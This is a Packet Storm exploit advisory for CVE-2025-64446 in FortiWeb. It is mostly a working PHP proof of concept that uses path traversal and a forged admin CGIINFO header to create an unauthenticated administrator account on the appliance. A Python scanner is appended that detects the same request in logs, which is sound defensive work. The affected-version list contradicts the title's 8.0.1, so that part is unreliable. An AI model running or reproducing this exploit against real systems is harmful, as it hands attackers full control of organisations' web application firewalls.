
📄 FortiWeb 8.0.1 Authentication Bypass

Reported 27 Nov 2025 by indoushka. Type: packetstorm. Source: packetstorm.news

FortiWeb authentication bypass enables unauthenticated admin user creation via path traversal.

Code
    =============================================================================================================================================
    | # Title     : FortiWeb 8.0.1 Authentication Bypass to Unauthorized User Creation                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.1 (64-bit)                                                            |
    | # Vendor    : https://www.fortinet.com/                                                                                                   |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-64446
                     https://packetstorm.news/files/id/211729/
                     https://fortiguard.fortinet.com/psirt/FG-IR-25-071
    
    [+] Summary
       
        A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint.
        This vulnerability enables complete compromise of the FortiWeb management interface.
    
    [+] Vulnerability Type: Authentication Bypass via Path Traversal → Unauthorized User Creation
    
    • Affected Versions: FortiWeb 7.2.1 and earlier, 7.0.6 and earlier, 6.4.2 and earlier, 6.3.7 and earlier
    • Patched Version: 7.2.2, 7.0.7, 6.4.3, 6.3.8
    • Attack Vector: Network
    • Authentication: Not Required (Unauthenticated)
    • CVSS Score: 9.8 (Critical)
    • CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') & CWE-862: Missing Authorization
    • CVE: CVE-2025-64446
    
    [+] Technical Description
    
    The vulnerability exists in FortiWeb's API endpoint handling, where improper path validation allows an unauthenticated attacker to bypass the authentication checks that protect the management API. The flaw enables:
    
    1. Path traversal to access privileged CGI endpoints
    2. Bypass of API authentication checks
    3. Unauthorized creation of administrative users
    4. Complete compromise of FortiWeb management
    
    [+] Usage:
    
        php poc.php fortigate.example.com:8443
    
    [+] POC :
    
    <?php
    /**
     * CVE-2025-64446 Exploit - FortiWeb Authentication Bypass
     * By: indoushka
     */
    
    class FortiWebExploit {
        private $colors;
        
        public function __construct() {
            $this->colors = [
                'RED'     => "\033[91m",
                'GREEN'   => "\033[92m",
                'YELLOW'  => "\033[93m",
                'BLUE'    => "\033[94m",
                'MAGENTA' => "\033[95m",
                'CYAN'    => "\033[96m",
                'WHITE'   => "\033[97m",
                'BOLD'    => "\033[1m",
                'RESET'   => "\033[0m"
            ];
        }
        
        private function color($text, $color) {
            return $this->colors[$color] . $text . $this->colors['RESET'];
        }
        
        private function showBanner() {
            $banner = $this->color("
     
     indoushka (*) FortiWeb Authentication Bypass Artifact Generator
     
    
    ", 'MAGENTA') . 
    $this->color("        CVEs: [CVE-2025-64446]\n", 'RED');
    
            echo $banner . "\n";
        }
        
        private function generateUUID() {
            return sprintf('%04x%04x', mt_rand(0, 0xffff), mt_rand(0, 0xffff));
        }
        
        public function execute($target) {
            $this->showBanner();
            
            // Parse target host and port
            $parts = explode(':', $target);
            if (count($parts) !== 2) {
                echo $this->color("[-] Invalid format! Use <host:port>", 'RED') . "\n";
                exit(1);
            }
            
            $host = $parts[0];
            $port = (int)$parts[1];
            $user = $this->generateUUID();
            $password = $user;
            
            $rawPath = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi";
            
            $cgiinfoJson = [
                "username" => "admin",
                "profname" => "prof_admin",
                "vdom" => "root",
                "loginname" => "admin"
            ];
            
            $cgiinfoB64 = base64_encode(json_encode($cgiinfoJson));
            
            $headers = [
                "CGIINFO: " . $cgiinfoB64,
                "Content-Type: application/x-www-form-urlencoded",
            ];
            
            $body = [
                "data" => [
                    "q_type" => 1,
                    "name" => $user,
                    "access-profile" => "prof_admin",
                    "access-profile_val" => "0",
                    "trusthostv4" => "0.0.0.0/0",
                    "trusthostv6" => "::/0",
                    "last-name" => "",
                    "first-name" => "",
                    "email-address" => "",
                    "phone-number" => "",
                    "mobile-number" => "",
                    "hidden" => 0,
                    "comments" => "",
                    "sz_dashboard" => -1,
                    "type" => "local-user",
                    "type_val" => "0",
                    "admin-usergrp_val" => "0",
                    "wildcard_val" => "0",
                    "accprofile-override_val" => "0",
                    "sshkey" => "",
                    "passwd-set-time" => 0,
                    "history-password-pos" => 0,
                    "history-password0" => "",
                    "history-password1" => "",
                    "history-password2" => "",
                    "history-password3" => "",
                    "history-password4" => "",
                    "history-password5" => "",
                    "history-password6" => "",
                    "history-password7" => "",
                    "history-password8" => "",
                    "history-password9" => "",
                    "force-password-change" => "disable",
                    "force-password-change_val" => "0",
                    "password" => $password
                ]
            ];
            
            $bodyData = json_encode($body);
            
            echo $this->color("[~] Sending exploit payload to $host:$port ...", 'BLUE') . "\n";
            
            // Create SSL context to disable verification
            $context = stream_context_create([
                'ssl' => [
                    'verify_peer' => false,
                    'verify_peer_name' => false,
                    'allow_self_signed' => true
                ],
                'http' => [
                    'method' => 'POST',
                    'header' => implode("\r\n", $headers) . "\r\n",
                    'content' => $bodyData,
                    'ignore_errors' => true
                ]
            ]);
            
            $url = "https://$host:$port$rawPath";
            
            // Send the request
            $response = @file_get_contents($url, false, $context);
            
            if ($response === false) {
                echo $this->color("[✗] Exploit failed - Could not connect to target", 'RED') . "\n";
                exit(1);
            }
            
            // Get HTTP status code from response headers
            $statusCode = 0;
            if (isset($http_response_header[0])) {
                preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $matches);
                $statusCode = isset($matches[1]) ? (int)$matches[1] : 0;
            }
            
            // Process result
            if ($statusCode === 200) {
                echo $this->color("[✓] Exploit sent successfully!", 'GREEN') . "\n";
                echo $this->color("[*] New user created → ", 'YELLOW') . $this->color($user, 'GREEN') . "\n";
                echo $this->color("[*] Password         → ", 'YELLOW') . $this->color($password, 'GREEN') . "\n";
            } else {
                echo $this->color("[✗] Exploit failed — Status Code: $statusCode", 'RED') . "\n";
                
                // Debug information
                if (!empty($http_response_header)) {
                    echo $this->color("[*] Response headers:", 'YELLOW') . "\n";
                    foreach ($http_response_header as $header) {
                        echo "    $header\n";
                    }
                }
                
                if (!empty($response)) {
                    echo $this->color("[*] Response body:", 'YELLOW') . "\n";
                    echo substr($response, 0, 500) . "\n";
                }
            }
        }
    }
    
    // Main execution
    if (php_sapi_name() === 'cli') {
        if ($argc !== 2) {
            echo "Usage: php cve-2025-64446.php <target_fortiweb_ip:port>\n";
            echo "Example: php cve-2025-64446.php 192.168.1.1:443\n";
            exit(1);
        }
        
        $exploit = new FortiWebExploit();
        $exploit->execute($argv[1]);
    } else {
        echo "This script is intended for command line use only.\n";
    }
    ?>
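    The following is an added detection example and is not part of the advisory or the author's PoC. It scans constructed access-log lines (the Apache-style line format with a trailing cgiinfo= field is an assumption, not FortiWeb's native log format) for the three markers the request above exposes: a percent-encoded query delimiter (%3f) inside the path, `..` segments that escape the /api/v2.0/ prefix and resolve to /cgi-bin/fwbcgi, and a client-supplied CGIINFO header whose decoded JSON claims the admin identity. The first sample line reproduces the PoC request; the other two are benign API traffic that must not be flagged.

```python
"""Detection example for the CVE-2025-64446 request pattern (added; not the advisory's code)."""
import base64
import json
import posixpath
import re
from urllib.parse import unquote

API_PREFIX = "/api/v2.0/"
CGI_PATH = "/cgi-bin/fwbcgi"

# Constructed sample log. The CGIINFO value is built at runtime from the same JSON the PoC sends.
_POC_CGIINFO = base64.b64encode(json.dumps({
    "username": "admin", "profname": "prof_admin", "vdom": "root", "loginname": "admin"
}).encode()).decode()

SAMPLE_LOG = "\n".join([
    '203.0.113.10 - - [27/Nov/2025:10:00:00 +0000] "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 cgiinfo="' + _POC_CGIINFO + '"',
    '198.51.100.7 - - [27/Nov/2025:10:00:05 +0000] "GET /api/v2.0/cmdb/system/admin HTTP/1.1" 401 cgiinfo="-"',
    '198.51.100.7 - - [27/Nov/2025:10:00:09 +0000] "GET /api/v2.0/system/status HTTP/1.1" 200 cgiinfo="-"',
])

# Assumed log format: client ident user [timestamp] "METHOD target PROTO" status cgiinfo="..."
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) cgiinfo="(?P<cgiinfo>[^"]*)"$'
)


def normalize(target: str) -> str:
    """Percent-decode the request target and collapse '.'/'..' segments the way a
    filesystem-style resolver would. The PoC path resolves to /cgi-bin/fwbcgi."""
    return posixpath.normpath(unquote(target))


def decode_cgiinfo(value: str):
    """Return the CGIINFO JSON object, or None when the header is absent or undecodable."""
    if value in ("", "-"):
        return None
    try:
        obj = json.loads(base64.b64decode(value, validate=True))
    except ValueError:  # covers binascii.Error, UnicodeDecodeError and JSONDecodeError
        return None
    return obj if isinstance(obj, dict) else None


def analyze(target: str, cgiinfo: str) -> list:
    """Return the list of findings for one request; an empty list means nothing suspicious."""
    findings = []
    if "%3f" in target.lower():
        # A literal '?' encoded inside the path, so it survives into path resolution.
        findings.append("encoded-query-delimiter-in-path")
    decoded = unquote(target)
    resolved = normalize(target)
    if target.startswith(API_PREFIX) and ".." in decoded.split("/"):
        if not resolved.startswith(API_PREFIX):
            findings.append("api-prefix-escape")
        if resolved == CGI_PATH:
            findings.append("fwbcgi-reached-via-traversal")
    info = decode_cgiinfo(cgiinfo)
    if info is not None:
        # CGIINFO is meant to be set internally; a client-supplied copy is itself anomalous.
        findings.append("client-supplied-cgiinfo")
        if info.get("username") == "admin" or info.get("profname") == "prof_admin":
            findings.append("cgiinfo-claims-admin")
    return findings


def scan_log(text: str) -> list:
    """Parse each line and return a record for every line with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze(m["target"], m["cgiinfo"])
        if findings:
            hits.append({"client": m["client"], "status": int(m["status"]),
                         "target": m["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["target"], ", ".join(hit["findings"]))
```

    A 200 on a request that carries all five findings is the strongest signal; the traversal markers alone are worth alerting on even when the response is a 4xx, since they indicate probing. Any proxy in front of the appliance can also enforce the first two checks directly by normalising the path before matching the /api/v2.0/ route.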
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 9.8
EPSS: 0.9299